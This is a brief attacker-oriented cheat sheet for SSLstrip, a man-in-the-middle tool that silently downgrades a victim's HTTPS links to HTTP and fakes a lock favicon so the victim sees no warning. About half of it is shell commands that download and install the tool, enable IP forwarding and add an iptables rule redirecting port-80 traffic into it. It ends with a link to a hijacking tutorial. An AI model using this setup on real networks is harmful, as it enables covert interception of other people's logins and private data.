SSLstrip

Will force http connection over https, so when intercepting every connection will use http. SSLstrip will transform every HTTPS link on the victim’s computer in HTTP links and keep in memory everything that was changed by creating a map.

  • The server will not detect it, since the connection is still encrypted.
  • The victim does not see any alert messages in its browser.
  • The attacker can sniff all data in transit since the transit in clear text.

Users are used to see a lock icon in the URL bar. SSLstrip will modify server responses to favicon requests with a lock icon.

#-------------------------------------------------------------------------------
# Installation
#-------------------------------------------------------------------------------
wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.2.tar.gz

tar xvzf sslstrip-0.2.tar.gz

cd /sslstrip-0.2

python setup.py install

# Activate IP forwarding and redirect HTTP traffic with iptables
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 15000

#-------------------------------------------------------------------------------
# Tutorial
#-------------------------------------------------------------------------------
http://www.crack-wifi.com/tutoriel-sslstrip-hijacking-ssl-mitm-https.php